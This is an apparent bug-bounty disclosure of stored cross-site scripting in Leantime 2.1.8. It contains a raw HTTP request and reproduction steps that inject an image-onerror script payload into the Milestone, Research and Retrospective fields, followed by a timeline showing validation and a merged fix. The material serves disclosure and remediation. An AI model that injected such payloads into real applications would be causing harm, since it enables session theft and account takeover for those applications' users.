Cross-site Scripting (XSS) - Stored in leantime/leantime

Valid

Reported on

Oct 12th 2021


Description

Multiple Stored XSS on featuers 'Milestones' , 'Research', 'Retrospective' at Leantime 2.1.8

Proof of Concept

// PoC.req
POST /leantime/public/tickets/editMilestone/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 157
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/leantime/public/tickets/roadmap
Cookie: sid=e48bc373a563a82ae266820d40707a63b9c0bad4-3cef7db646d7f8424c47025854198bf8d39caede
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

headline=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(1)%3B%22%3E&status=3&dependentMilestone=&editorId=&tags=&editFrom=10%2F11%2F2021&editTo=10%2F18%2F2021

Step to Reproduct

Milestones

Goto Milestones choose to Add Milestones

At 'Milestone Title' input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

Research

Goto Research, at Board choose to Add new

At 'Hypothesis' input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

Retrospective

Goto Retrospective, at Board choose to Add new

At 'Description' input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the leantime team and are waiting to hear back 2 months ago
We have contacted a member of the leantime team and are waiting to hear back 2 months ago
lethanhphuc modified their report
2 months ago
Marcel Folaron validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
25 days ago
Marcel Folaron confirmed that a fix has been merged on 22a6da 21 days ago
lethanhphuc has been awarded the fix bounty